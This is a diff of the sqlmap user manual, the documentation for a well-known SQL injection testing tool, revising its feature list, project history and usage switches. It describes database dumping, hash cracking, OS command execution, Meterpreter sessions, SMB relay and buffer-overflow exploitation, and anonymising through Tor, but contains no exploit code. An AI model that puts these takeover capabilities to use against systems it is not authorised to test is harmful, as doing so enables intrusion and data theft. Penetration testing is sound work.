-<item>Automatically handle <bf>HTTP <tt>Set-Cookie</tt> header</bf> from
+<item>Automatically handles <bf>HTTP <tt>Set-Cookie</tt> header</bf> from
 the application, re-establishing of the session if it expires. Test and
-exploit on these values is supported too. You can also force to ignore any
-<tt>Set-Cookie</tt> header.
+exploit on these values is supported too. Vice versa, you can also force
+to ignore any <tt>Set-Cookie</tt> header.
 
-<item><bf>HTTP Basic, Digest, NTLM and Certificate authentications</bf>
-support.
+<item>HTTP protocol <bf>Basic, Digest, NTLM and Certificate
+authentications</bf> support.
 
-<item><bf>Anonymous HTTP proxy</bf> support to pass by the requests to the
-target application that works also with HTTPS requests.
+<item><bf>HTTP(S) proxy</bf> support to pass by the requests to the target
+application that works also with HTTPS requests and with authenticated
+proxy servers.
 
 <item>Options to fake the <bf>HTTP <tt>Referer</tt> header</bf> value and
 the <bf>HTTP <tt>User-Agent</tt> header</bf> value specified by user or
-randomly selected from a text file.
+randomly selected from a textual file.
 
 <item>Support to increase the <bf>verbosity level of output messages</bf>:
-there exist <bf>six levels</bf>. The default level is <bf>1</bf> in which
-information, warnings, errors and tracebacks (if any occur) will be shown.
+there exist <bf>seven levels</bf> of verbosity.
 
-<item>Granularity in the user's options.
+<item>Support to <bf>parse HTML forms</bf> from the target URL and forge
+HTTP(S) requests against those pages to test the form parameters against
+vulnerabilities.
+
+<item><bf>Granularity and flexibility</bf> in terms of both user's
+switches and features.
 
 <item><bf>Estimated time of arrival</bf> support for each query, updated
-in real time while fetching the information to give to the user an
-overview on how long it will take to retrieve the output.
+in real time, to provide the user with an overview on how long it will
+take to retrieve the queries' output.
 
-<item>Automatic support to save the session (queries and their output,
-even if partially retrieved) in real time while fetching the data on a
-text file and <bf>resume the injection from this file in a second
-time</bf>.
+<item>Automatically saves the session (queries and their output, even if
+partially retrieved) on a textual file in real time while fetching the
+data and <bf>resumes the injection</bf> by parsing the session file.
 
 <item>Support to read options from a configuration INI file rather than
-specify each time all of the options on the command line. Support also to
-save command line options on a configuration INI file.
+specify each time all of the switches on the command line. Support also to
+generate a configuration file based on the command line switches provided.
 
-<item>Option to update sqlmap as a whole to the latest development version
-from the Subversion repository.
+<item>Support to <bf>replicate the back-end database tables structure and
+entries</bf> on a local SQLite 3 database.
+
+<item>Option to update sqlmap to the latest development version from the
+subversion repository.
+
+<item>Support to parse HTTP(S) responses and display any DBMS error
+message to the user.
 
 <item>Integration with other IT security open source projects,
 <htmlurl url="http://metasploit.com/framework/" name="Metasploit"> and <htmlurl
@@ -339,37 +355,48 @@ url="http://w3af.sourceforge.net/" name="w3af">.
 <itemize>
 <item><bf>Extensive back-end database software version and underlying
 operating system fingerprint</bf> based upon
-<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="inband error messages">,
+<htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="error messages">,
 <htmlurl url="http://bernardodamele.blogspot.com/2007/06/database-management-system-fingerprint.html" name="banner parsing">,
 <htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="functions output comparison"> and
 <htmlurl url="http://bernardodamele.blogspot.com/2007/07/more-on-database-management-system.html" name="specific features">
 such as MySQL comment injection. It is also possible to force the back-end
 database management system name if you already know it.
 
-<item>Basic web server software and web application technology fingerprint.
+<item>Basic web server software and web application technology
+fingerprint.
 
 <item>Support to retrieve the DBMS <bf>banner</bf>, <bf>session user</bf>
 and <bf>current database</bf> information. The tool can also check if the
-session user is a database administrator (DBA).
+session user is a <bf>database administrator</bf> (DBA).
 
 <item>Support to enumerate <bf>database users</bf>, <bf>users' password
-hashes</bf>, <bf>users' privileges</bf>, <bf>databases</bf>,
-<bf>tables</bf> and <bf>columns</bf>.
+hashes</bf>, <bf>users' privileges</bf>, <bf>users' roles</bf>,
+<bf>databases</bf>, <bf>tables</bf> and <bf>columns</bf>.
 
-<item>Support to <bf>dump database tables</bf> as a whole or a range of
-entries as per user's choice. The user can also choose to dump only
-specific column(s).
+<item>Automatic recognition of password hashes format and support to
+<bf>crack them with a dictionary-based attack</bf>.
 
-<item>Support to automatically dump <bf>all</bf> databases' schemas and
+<item>Support to <bf>brute-force tables and columns name</bf>. This is
+useful when the session user has no read access over the system table
+containing schema information or when the database management system does
+not store this information anywhere (e.g. MySQL < 5.0).
+
+<item>Support to <bf>dump database tables</bf> entirely, a range of
+entries or specific columns as per user's choice. The user can also choose
+to dump only a range of characters from each column's entry.
+
+<item>Support to automatically <bf>dump all databases</bf>' schemas and
 entries. It is possibly to exclude from the dump the system databases.
 
-<item>Support to enumerate and dump <bf>all databases' tables containing user
-provided column(s)</bf>. Useful to identify for instance tables containing
-custom application credentials.
+<item>Support to <bf>search for specific database names, specific tables
+across all databases or specific columns across all databases'
+tables</bf>. This is useful, for instance, to identify tables containing
+custom application credentials where relevant columns' names contain
+string like <em>name</em> and <em>pass</em>.
 
 <item>Support to <bf>run custom SQL statement(s)</bf> as in an interactive
 SQL client connecting to the back-end database. sqlmap automatically
-dissects the provided statement, determines which technique to use to
+dissects the provided statement, determines which technique fits best to
 inject it and how to pack the SQL payload accordingly.
 </itemize>
 
@@ -378,18 +405,19 @@ inject it and how to pack the SQL payload accordingly.
 
 <p>
 Some of these techniques are detailed in the white paper
-<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="Advanced SQL injection to operating system full control"> and in the
 slide deck <htmlurl url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database"
 name="Expanding the control over the operating system from the database">.
 
 <itemize>
 <item>Support to <bf>inject custom user-defined functions</bf>: the user
-can compile shared object then use sqlmap to create within the back-end
-DBMS user-defined functions out of the compiled shared object file. These
-UDFs can then be executed, and optionally removed, via sqlmap too.
+can compile a shared library then use sqlmap to create within the back-end
+DBMS user-defined functions out of the compiled shared library file. These
+UDFs can then be executed, and optionally removed, via sqlmap. This is
+supported when the database software is MySQL or PostgreSQL.
 
-<item>Support to <bf>read and upload any file</bf> from the database
+<item>Support to <bf>download and upload any file</bf> from the database
 server underlying file system when the database software is MySQL,
 PostgreSQL or Microsoft SQL Server.
 
@@ -401,13 +429,14 @@ when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
 execution.
 <item>On Microsoft SQL Server via <tt>xp_cmdshell()</tt> stored procedure.
 Also, the stored procedure is re-enabled if disabled or created from
-scratch if removed.
+scratch if removed by the DBA.
 </itemize>
 
 <item>Support to <bf>establish an out-of-band stateful TCP connection
-between the user machine and the database server</bf> underlying operating
-system. This channel can be an interactive command prompt, a Meterpreter
-session or a graphical user interface (VNC) session as per user's choice.
+between the attacker machine and the database server</bf> underlying
+operating system. This channel can be an interactive command prompt, a
+Meterpreter session or a graphical user interface (VNC) session as per
+user's choice.
 sqlmap relies on Metasploit to create the shellcode and implements four
 different techniques to execute it on the database server. These
 techniques are:
@@ -423,14 +452,19 @@ Server.
 reflection attack</bf> (<htmlurl
 url="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"
 name="MS08-068">) with a UNC path request from the database server to
-the user's machine where the Metasploit <tt>smb_relay</tt> server exploit
-runs.
+the attacker's machine where the Metasploit <tt>smb_relay</tt> server
+exploit listens. Supported when running sqlmap with high privileges
+(<tt>uid=0</tt>) on Linux/Unix and the target DBMS runs as Administrator
+on Windows.
 <item>Database in-memory execution of the Metasploit's shellcode by
 exploiting <bf>Microsoft SQL Server 2000 and 2005
 <tt>sp_replwritetovarbin</tt> stored procedure heap-based buffer
 overflow</bf> (<htmlurl
 url="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx"
-name="MS09-004">) with automatic DEP bypass.
+name="MS09-004">). sqlmap has its own exploit to trigger the
+vulnerability with automatic DEP memory protection bypass, but it relies
+on Metasploit to generate the shellcode to get executed upon successful
+exploitation.
 </itemize>
 
 <item>Support for <bf>database process' user privilege escalation</bf> via
@@ -439,18 +473,15 @@ the <htmlurl
 url="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html"
 name="kitrap0d"> technique (<htmlurl
 url="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx"
-name="MS10-015">) or via <htmlurl
-url="http://labs.mwrinfosecurity.com/files/Publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf"
-name="Windows Access Tokens insecure design"> by using Meterpreter's
-<tt>incognito</tt> extension.
+name="MS10-015">).
 
 <item>Support to access (read/add/delete) Windows registry hives.
 </itemize>
 
 
-<sect1>History
+<sect>History
 
-<sect2>2011
+<sect1>2011
 
 <p>
 <itemize>
@@ -462,7 +493,7 @@ server, support for time-based blind SQL injection and error-based SQL
 injection, support for four new database management systems and much more.
 </itemize>
 
-<sect2>2010
+<sect1>2010
 
 <p>
 <itemize>
@@ -472,7 +503,8 @@ lot during the whole year and prepare to release sqlmap <bf>0.9</bf>
 within the first quarter of 2011.
 <item><bf>June 3</bf>, Bernardo <htmlurl name="presents"
 url="http://www.slideshare.net/inquis/ath-con-2010bernardodamelegotdbownnet">
-a talk titled <em>Got database access? Own the network!</em> at AthCon 2010 in Athens (Greece).
+a talk titled <em>Got database access? Own the network!</em> at AthCon
+2010 in Athens (Greece).
 <item><bf>March 14</bf>, <htmlurl name="Bernardo and Miroslav"
 url="http://sqlmap.sourceforge.net/#developers"> release stable version of 
 sqlmap <bf>0.8</bf> featuring many features. Amongst these, support to
@@ -481,14 +513,14 @@ column(s), stabilization and enhancements to the takeover functionalities,
 updated integration with Metasploit 3.3.3 and a lot of minor features and
 bug fixes.
 <item><bf>March</bf>, sqlmap demo videos have been <htmlurl
-name="published" url="http://sqlmap.sourceforge.net/demo.html">.
+name="published" url="http://www.youtube.com/inquisb#g/u">.
 <item><bf>January</bf>, Bernardo is <htmlurl name="invited"
 url="http://www.athcon.org/speakers/"> to present at <htmlurl
 name="AthCon" url="http://www.athcon.org/archives/2010-2/"> conference in
 Greece on June 2010.
 </itemize>
 
-<sect2>2009
+<sect1>2009
 
 <p>
 <itemize>
@@ -510,7 +542,7 @@ research on stealth database server takeover at CONfidence 2009 in Warsaw,
 Poland.
 
 <item><bf>September 26</bf>, sqlmap version <bf>0.8 release candidate
-1</bf> goes public on the <htmlurl name="Subversion repository"
+1</bf> goes public on the <htmlurl name="subversion repository"
 url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/">, with all the attack
 vectors unveiled at SOURCE Barcelona 2009 Conference. These include an
 enhanced version of the Microsoft SQL Server buffer overflow exploit to
@@ -522,11 +554,14 @@ inject custom user-defined functions.
 
 <item><bf>September 21</bf>, Bernardo and <htmlurl name="Guido Landi"
 url="http://www.pornosecurity.org"> <htmlurl name="present"
-url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule"> their research (<htmlurl name="slides"
-url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">) at SOURCE Conference 2009 in Barcelona, Spain.
+url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009/schedule">
+their research (<htmlurl name="slides"
+url="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">)
+at SOURCE Conference 2009 in Barcelona, Spain.
 
 <item><bf>August</bf>, Bernardo is accepted as a speaker at two others IT
-security conferences, <htmlurl url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009" name="SOURCE Barcelona 2009"> and <htmlurl url="http://200902.confidence.org.pl/"
+security conferences, <htmlurl url="http://www.sourceconference.com/index.php/pastevents/source-barcelona-2009"
+name="SOURCE Barcelona 2009"> and <htmlurl url="http://200902.confidence.org.pl/"
 name="CONfidence 2009 Warsaw">.
 This new research is titled <em>Expanding the control over the operating
 system from the database</em>.
@@ -567,7 +602,7 @@ the database.
 
 <item><bf>April 16</bf>, Bernardo <htmlurl url="http://www.blackhat.com/html/bh-europe-09/bh-eu-09-archives.html#Damele"
 name="presents"> his research (<htmlurl url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides" name="slides">, <htmlurl
-url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf"
+url="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857"
 name="whitepaper">) at Black Hat Europe 2009 in Amsterdam, The Netherlands.
 The feedback from the audience is good and there has been some 
 <htmlurl url="http://bernardodamele.blogspot.com/2009/03/black-hat-europe-2009.html"
@@ -597,7 +632,7 @@ name="presents"> <em>SQL injection exploitation internals</em> at a
 private event in London, UK.
 </itemize>
 
-<sect2>2008
+<sect1>2008
 
 <p>
 <itemize>
@@ -616,7 +651,7 @@ public. This includes minor bug fixes and the first contact between the
 tool and <htmlurl url="http://metasploit.com/framework" name="Metasploit">:
 an auxiliary module to launch sqlmap from within Metasploit Framework.
 The <htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/"
-name="Subversion development repository"> goes public again.
+name="subversion development repository"> goes public again.
 
 <item><bf>September 1</bf>, nearly one year after the previous release,
 sqlmap <bf>0.6</bf> comes to life featuring a complete code
@@ -627,11 +662,11 @@ new installation packages for Debian, Red Hat, Windows and much more.
 <item><bf>August</bf>, two public <htmlurl name="mailing lists"
 url="http://sqlmap.sourceforge.net/#ml"> are created on SourceForge.
 
-<item><bf>January</bf>, sqlmap Subversion development repository is moved
+<item><bf>January</bf>, sqlmap subversion development repository is moved
 away from SourceForge and goes private for a while.
 </itemize>
 
-<sect2>2007
+<sect1>2007
 
 <p>
 <itemize>
@@ -664,7 +699,7 @@ and exploit UNION query SQL injections and injection points in POST
 parameters.
 </itemize>
 
-<sect2>2006
+<sect1>2006
 
 <p>
 <itemize>
@@ -682,7 +717,7 @@ version <bf>0.1</bf>.
 <item><bf>July 25</bf>, <htmlurl url="http://dbellucci.blogspot.com" name="Daniele Bellucci">
 registers the sqlmap project on SourceForge and develops it on the
 <htmlurl url="http://sqlmap.svn.sourceforge.net/viewvc/sqlmap/"
-name="SourceForge Subversion repository">. The skeleton is implemented and
+name="SourceForge subversion repository">. The skeleton is implemented and
 limited support for MySQL added.
 </itemize>
 
@@ -704,7 +739,7 @@ name="Source zip compressed">.
 
 <p>
 You can also checkout the latest development version from the
-<htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/" name="Subversion">
+<htmlurl url="https://svn.sqlmap.org/sqlmap/trunk/sqlmap/" name="subversion">
 repository:
 
 <tscreen><verb>
@@ -712,7 +747,7 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
 </verb></tscreen>
 
 <p>
-You can update it to the latest development version anytime by running:
+You can update it at any time to the latest development version by running:
 
 <tscreen><verb>
 $ python sqlmap.py --update
@@ -729,14 +764,6 @@ This is strongly recommended <bf>before</bf> reporting any bug to the
 <htmlurl url="http://sqlmap.sourceforge.net/#ml" name="mailing list">.
 
 
-<sect>License and copyright
-
-<p>
-sqlmap is released under the terms of the
-<htmlurl url="http://www.gnu.org/licenses/old-licenses/gpl-2.0.html" name="General Public License v2">.
-sqlmap is copyrighted by its <htmlurl url="http://sqlmap.sourceforge.net/#developers" name="developers">.
-
-
 <sect>Usage
 
 <p>
@@ -820,9 +847,8 @@ Options:
     --text-only         Compare pages based only on their textual content
 
   Techniques:
-    These options can be used to test for specific SQL injection technique
-    or to use one of them to exploit the affected parameter(s) rather than
-    using the default blind SQL injection technique.
+    These options can be used to tweak how specific SQL injection
+    techniques are tested.
 
     --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
     --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
@@ -938,27 +964,27 @@ Switch: <tt>-v</tt>
 <p>
 This switch can be used to set the verbosity level of output messages.
 There exist <bf>seven</bf> levels of verbosity.
-The default level is <bf>1</bf> in which information, warnings, errors, critical messages and Python tracebacks (if any occur) will be displayed.
+The default level is <bf>1</bf> in which information, warning, error and critical messages and Python tracebacks (if any occur) will be displayed.
 
 <itemize>
-<item><tt>0</tt>: Show only critical messages
-<item><tt>1</tt>: Show also warning and information messages
-<item><tt>2</tt>: Show also debug messages
-<item><tt>3</tt>: Show also payloads injected
-<item><tt>4</tt>: Show also HTTP requests
-<item><tt>5</tt>: Show also HTTP responses' headers
-<item><tt>6</tt>: Show also HTTP responses' page content
+<item><tt>0</tt>: Show only Python tracebacks, error and critical messages.
+<item><tt>1</tt>: Show also information and warning messages.
+<item><tt>2</tt>: Show also debug messages.
+<item><tt>3</tt>: Show also payloads injected.
+<item><tt>4</tt>: Show also HTTP requests.
+<item><tt>5</tt>: Show also HTTP responses' headers.
+<item><tt>6</tt>: Show also HTTP responses' page content.
 </itemize>
 
 <p>
-A reasonable level of verbosity to further understand what sqlmap is doing under the hood is level <bf>2</bf>, primarily for the detection phase and the take-over functionalities. Whereas if you want to make sure you know which SQL payloads the tools sends, level <bf>3</bf> is your best choice. In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level <bf>4</bf> or above. This level is recommended to be used when you feed the developers with a bug report too.
+A reasonable level of verbosity to further understand what sqlmap does under the hood is level <bf>2</bf>, primarily for the detection phase and the take-over functionalities. Whereas if you want to see the SQL payloads the tools sends, level <bf>3</bf> is your best choice.
+In order to further debug potential bugs or unexpected behaviours, we recommend you to set the verbosity to level <bf>4</bf> or above. This level is recommended to be used when you feed the developers with a bug report too.
 
 
 <sect1>Target
 
 <p>
-At least one of these options has to be specified to set the source to get
-target URLs from.
+At least one of these options has to be provided.
 
 <sect2>Target URL
 
@@ -966,7 +992,8 @@ target URLs from.
 Switch: <tt>-u</tt> or <tt>-</tt><tt>-url</tt>
 
 <p>
-Run sqlmap against a single target URL.
+Run sqlmap against a single target URL. This switch requires an argument
+which is the target URL in the form <tt>http(s)://targeturl/[...]</tt>.
 
 <sect2>Parse targets from Burp or WebScarab proxy logs
 
@@ -975,10 +1002,11 @@ Switch: <tt>-l</tt>
 
 <p>
 Rather than providing a single target URL, it is possible to test and
-inject on HTTP requests proxied through <htmlurl url="http://portswigger.net/suite/"
+inject against HTTP requests proxied through <htmlurl url="http://portswigger.net/suite/"
 name="Burp proxy"> or <htmlurl
 url="http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project"
-name="WebScarab proxy">.
+name="WebScarab proxy"> This switch requires an argument which is the
+proxy's HTTP requests log file.
 
 <sect2>Load HTTP request from a file
 
@@ -987,11 +1015,11 @@ Switch: <tt>-r</tt>
 
 <p>
 One of the possibilities of sqlmap is loading of complete HTTP request
-stored in textual file. That way you can skip usage of bunch of other
+from a textual file. That way you can skip usage of bunch of other
 options (e.g. setting of cookies, POSTed data, etc).
 
 <p>
-Sample content of a HTTP request file:
+Sample content of a HTTP request file provided as argument to this switch:
 
 <tscreen><verb>
 POST /sqlmap/mysql/post_int.php HTTP/1.1
@@ -1053,8 +1081,8 @@ example is <tt>sqlmap.conf</tt>.
 
 <p>
 Note that if you also provide other options from command line, those are
-evaluated when running sqlmap and overwrite the same options, if set, in
-the provided configuration file.
+evaluated when running sqlmap and overwrite those provided in the
+configuration file.
 
 
 <sect1>Request
@@ -1062,7 +1090,7 @@ the provided configuration file.
 <p>
 These options can be used to specify how to connect to the target url.
 
-<sect2>HTTP method: <tt>GET</tt> or <tt>POST</tt>
+<sect2>HTTP data
 
 <p>
 Option: <tt>-</tt><tt>-data</tt>
@@ -1071,16 +1099,18 @@ Option: <tt>-</tt><tt>-data</tt>
 By default the HTTP method used to perform HTTP requests is <tt>GET</tt>,
 but you can implicitly change it to <tt>POST</tt> by providing the data to
 be sent in the <tt>POST</tt> requests. Such data, being those parameters,
-are tested for SQL injection as well as the <tt>GET</tt> parameters.
+are tested for SQL injection as well as any provided <tt>GET</tt>
+parameters.
 
 
 <sect2>HTTP <tt>Cookie</tt> header
 
 <p>
-Switches: <tt>-</tt><tt>-cookie</tt>, <tt>-</tt><tt>-cookie-urlencode</tt> and <tt>-</tt><tt>-drop-set-cookie</tt>
+Switches: <tt>-</tt><tt>-cookie</tt>, <tt>-</tt><tt>-drop-set-cookie</tt>
+and <tt>-</tt><tt>-cookie-urlencode</tt> 
 
 <p>
-This feature can be useful in two scenarios:
+This feature can be useful in two ways:
 
 <itemize>
 <item>The web application requires authentication based upon cookies and
@@ -1090,18 +1120,13 @@ you have such data.
 
 <p>
 Either reason brings you to need to send cookies with sqlmap requests, the
-steps to go through in the second scenario are the following:
+steps to go through are the following:
 
 <itemize>
-<item>On Firefox web browser login on the web authentication form while
-dumping URL requests with <htmlurl url="http://tamperdata.mozdev.org/"
-name="TamperData"> browser's extension or by passing through a HTTP proxy
-like Burp.
-<item>In the horizontal box of the extension select your authentication
-transaction then in the left box on the bottom click with the right button
-on the <tt>Cookie</tt> value, then click on <tt>Copy</tt> to save its
-value to the clipboard.
-<item>Go back to your shell and run sqlmap by pasting your clipboard to
+<item>Login to the application with your favourite browser.
+<item>Get the HTTP Cookie from the browser's preferences or from the HTTP
+proxy screen and copy to the clipboard.
+<item>Go back to your shell and run sqlmap by pasting your clipboard as
 the argument of the <tt>-</tt><tt>-cookie</tt> switch.
 </itemize>
 
@@ -1112,35 +1137,35 @@ recognize these as separate sets of <tt>parameter=value</tt> too, as well
 as GET and POST parameters.
 
 <p>
-If the web application responds with <tt>Set-Cookie</tt> headers at any
-time during the communication, sqlmap will automatically use its value in
+If at any time during the communication, the web application responds with
+<tt>Set-Cookie</tt> headers, sqlmap will automatically use its value in
 all further HTTP requests as the <tt>Cookie</tt> header. sqlmap will also
-automatically test those values for SQL injection, except if you run it
-with <tt>--drop-set-cookie</tt> option. In the latter case, sqlmap will
+automatically test those values for SQL injection. This can be avoided by
+providing the switch <tt>-</tt><tt>-drop-set-cookie</tt> - sqlmap will
 ignore any coming <tt>Set-Cookie</tt> header.
 
 <p>
 Vice versa, if you provide a HTTP <tt>Cookie</tt> header with
-<tt>--cookie</tt> switch and the target URL sends an HTTP <tt>Set-Cookie</tt>
-header at any time, sqlmap will ask you which one to use for the following
-HTTP requests.
+<tt>-</tt><tt>-cookie</tt> switch and the target URL sends an HTTP
+<tt>Set-Cookie</tt> header at any time, sqlmap will ask you which set of
+cookies to use for the following HTTP requests.
 
 <p>
-sqlmap by default <bf>does not</bf> URL encode generated cookie injections,
+sqlmap by default does <bf>not</bf> URL-encode generated cookie payloads,
 but you can force it by using the <tt>-</tt><tt>-cookie-urlencode</tt>
-switch. Cookie content encoding is not declared by standard in any way, so
-it is solely the matter of web application's behaviour.
+switch. Cookie content encoding is not declared by HTTP protocol standard
+in any way, so it is solely the matter of web application's behaviour.
 
 <p>
 Note that also the HTTP <tt>Cookie</tt> header is tested against SQL
-injection if the <tt>--level</tt> is set to <bf>2</bf> or above. See below
-for details.
+injection if the <tt>-</tt><tt>-level</tt> is set to <bf>2</bf> or above.
+Read below for details.
 
 
 <sect2>HTTP <tt>User-Agent</tt> header
 
 <p>
-Switches: <tt>-</tt><tt>-user-agent</tt> and <tt>--random-agent</tt>
+Switches: <tt>-</tt><tt>-user-agent</tt> and <tt>-</tt><tt>-random-agent</tt>
 
 <p>
 By default sqlmap performs HTTP requests with the following <tt>User-Agent</tt>
@@ -1152,29 +1177,29 @@ sqlmap/0.9 (http://sqlmap.sourceforge.net)
 
 <p>
 However, it is possible to fake it with the <tt>-</tt><tt>-user-agent</tt>
-option.
+switch by providing custom User-Agent as the switch argument.
 
 <p>
-Moreover, by providing the <tt>--random-agent</tt> switch, sqlmap will
-randomly select a <tt>User-Agent</tt> from the
-<tt>./txt/user-agents.txt</tt> textual file and use it for all HTTP
-requests within the session.
+Moreover, by providing the <tt>-</tt><tt>-random-agent</tt> switch, sqlmap
+will randomly select a <tt>User-Agent</tt> from the <tt>./txt/user-agents.txt</tt>
+textual file and use it for all HTTP requests within the session.
 
 <p>
 Some sites perform a server-side check on the HTTP <tt>User-Agent</tt>
 header value and fail the HTTP response if a valid <tt>User-Agent</tt> is
-not provided, its value is not expected or its value is blocked by a web
+not provided, its value is not expected or is blacklisted by a web
 application firewall or similar intrusion prevention system. In this case
 sqlmap will show you a message as follows:
 
 <tscreen><verb>
-[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --user-agent or --random-agent
+[hh:mm:20] [ERROR] the target url responded with an unknown HTTP status code, try to 
+force the HTTP User-Agent header with option --user-agent or --random-agent
 </verb></tscreen>
 
 <p>
 Note that also the HTTP <tt>User-Agent</tt> header is tested against SQL
-injection if the <tt>--level</tt> is set to <bf>3</bf> or above. See below
-for details.
+injection if the <tt>-</tt><tt>-level</tt> is set to <bf>3</bf> or above.
+Read below for details.
 
 
 <sect2>HTTP <tt>Referer</tt> header
@@ -1183,14 +1208,14 @@ for details.
 Switch: <tt>-</tt><tt>-referer</tt>
 
 <p>
-It is possible to fake the HTTP <tt>Referer</tt> header value with this
-option. By default <bf>no</bf> HTTP <tt>Referer</tt> header is sent in
-HTTP requests.
+It is possible to fake the HTTP <tt>Referer</tt> header value. By default
+<bf>no</bf> HTTP <tt>Referer</tt> header is sent in HTTP requests if not
+explicitly set.
 
 <p>
 Note that also the HTTP <tt>Referer</tt> header is tested against SQL
-injection if the <tt>--level</tt> is set to <bf>3</bf> or above. See below
-for details.
+injection if the <tt>-</tt><tt>-level</tt> is set to <bf>3</bf> or above.
+Read below for details.
 
 
 <sect2>Extra HTTP headers
@@ -1205,17 +1230,25 @@ newline and it is much easier to provide them from the configuration INI
 file. Have a look at the sample <tt>sqlmap.conf</tt> file for an example.
 
 
-<sect2>HTTP <tt>Basic</tt>, <tt>Digest</tt> and <tt>NTLM</tt> authentications
+<sect2>HTTP protocol authentication
 
 <p>
 Switches: <tt>-</tt><tt>-auth-type</tt> and <tt>-</tt><tt>-auth-cred</tt>
 
 <p>
-These options can be used to specify which HTTP authentication type the
-web server implements and the valid credentials to be used to perform all
-HTTP requests to the target application.
-The three valid types are <tt>Basic</tt>, <tt>Digest</tt> and <tt>NTLM</tt>,
-while the credentials' syntax is <tt>username:password</tt>.
+These options can be used to specify which HTTP protocol authentication
+the web server implements and the valid credentials to be used to perform
+all HTTP requests to the target application.
+
+The three supported HTTP protocol authentication mechanisms are:
+
+<itemize>
+<item><tt>Basic</tt>
+<item><tt>Digest</tt>
+<item><tt>NTLM</tt>
+</itemize>
+
+While the credentials' syntax is <tt>username:password</tt>.
 
 <p>
 Example of valid syntax:
@@ -1226,7 +1259,7 @@ $ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/basic/get_int.php?id=
 </verb></tscreen>
 
 
-<sect2>HTTP Certificate authentication
+<sect2>HTTP protocol certificate authentication
 
 <p>
 Switch: <tt>-</tt><tt>-auth-cert</tt>
@@ -1246,36 +1279,37 @@ chain file.
 Switches: <tt>-</tt><tt>-proxy</tt>, <tt>-</tt><tt>-proxy-cred</tt> and <tt>-</tt><tt>-ignore-proxy</tt>
 
 <p>
-It is possible to provide an anonymous HTTP(S) proxy address to pass by
-the HTTP(S) requests to the target URL. The syntax of HTTP(S) proxy value
-is <tt>http://url:port</tt>.
+It is possible to provide an HTTP(S) proxy address to pass by the HTTP(S)
+requests to the target URL. The syntax of HTTP(S) proxy value is
+<tt>http://url:port</tt>.
 
 <p>
-You can also pass by your requests through an authenticated HTTP(S) proxy
-server, by providing the credentials in the format <tt>username:password</tt>
-to the <tt>-</tt><tt>-proxy-cred</tt> switch.
+If the HTTP(S) proxy requires authentication, you can provide the
+credentials in the format <tt>username:password</tt> to the
+<tt>-</tt><tt>-proxy-cred</tt> switch.
 
 <p>
 If, for any reason, you need to stay anonymous, instead of passing by a
-single known HTTP(S) proxy server, you can configure a <htmlurl
+single predefined HTTP(S) proxy server, you can configure a <htmlurl
 url="http://www.torproject.org/" name="Tor client"> together with
-<htmlurl url="http://www.privoxy.org" name="Privoxy"> on your machine
-as explained on the Tor client guide and use the Privoxy daemon,
-by default listening on <tt>127.0.0.1:8118</tt>, as sqlmap proxy.
+<htmlurl url="http://www.privoxy.org" name="Privoxy"> (or similar) on
+your machine as explained on the Tor client guide and use the Privoxy
+daemon, by default listening on <tt>127.0.0.1:8118</tt>, as the sqlmap
+proxy.
 
 <p>
 The switch <tt>-</tt><tt>-ignore-proxy</tt> should be used when you want
-to run sqlmap against a target part of a local area network skipping
-default usage of a system-wide set HTTP(S) proxy server.
+to run sqlmap against a target part of a local area network by ignoring
+the system-wide set HTTP(S) proxy server setting.
 
 
-<sect2>Delay in seconds between each HTTP request
+<sect2>Delay between each HTTP request
 
 <p>
 Switch: <tt>-</tt><tt>-delay</tt>
 
 <p>
-It is possible to specify a number of seconds to wait between each HTTP(S)
+It is possible to specify a number of seconds to hold between each HTTP(S)
 request. The valid value is a float, for instance <tt>0.5</tt> means half
 a second.
 By default, no delay is set.
@@ -1290,7 +1324,7 @@ Switch: <tt>-</tt><tt>-timeout</tt>
 It is possible to specify a number of seconds to wait before considering
 the HTTP(S) request timed out. The valid value is a float, for instance
 10.5 means ten seconds and a half.
-By default 30 seconds are set.
+By default <bf>30 seconds</bf> are set.
 
 
 <sect2>Maximum number of retries when the HTTP connection timeouts
@@ -1300,7 +1334,7 @@ Switch: <tt>-</tt><tt>-retries</tt>
 
 <p>
 It is possible to specify the maximum number of retries when the HTTP(S)
-connection timeouts. By default it retries up to three times.
+connection timeouts. By default it retries up to <bf>three times</bf>.
 
 
 <sect2>Filtering targets from provided proxy log using regular expression
@@ -1320,19 +1354,39 @@ $ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
 </verb></tscreen>
 
 
-<sect2>TODO
+<sect2>Avoid your session to be destroyed after too many unsuccessful requests
 
 <p>
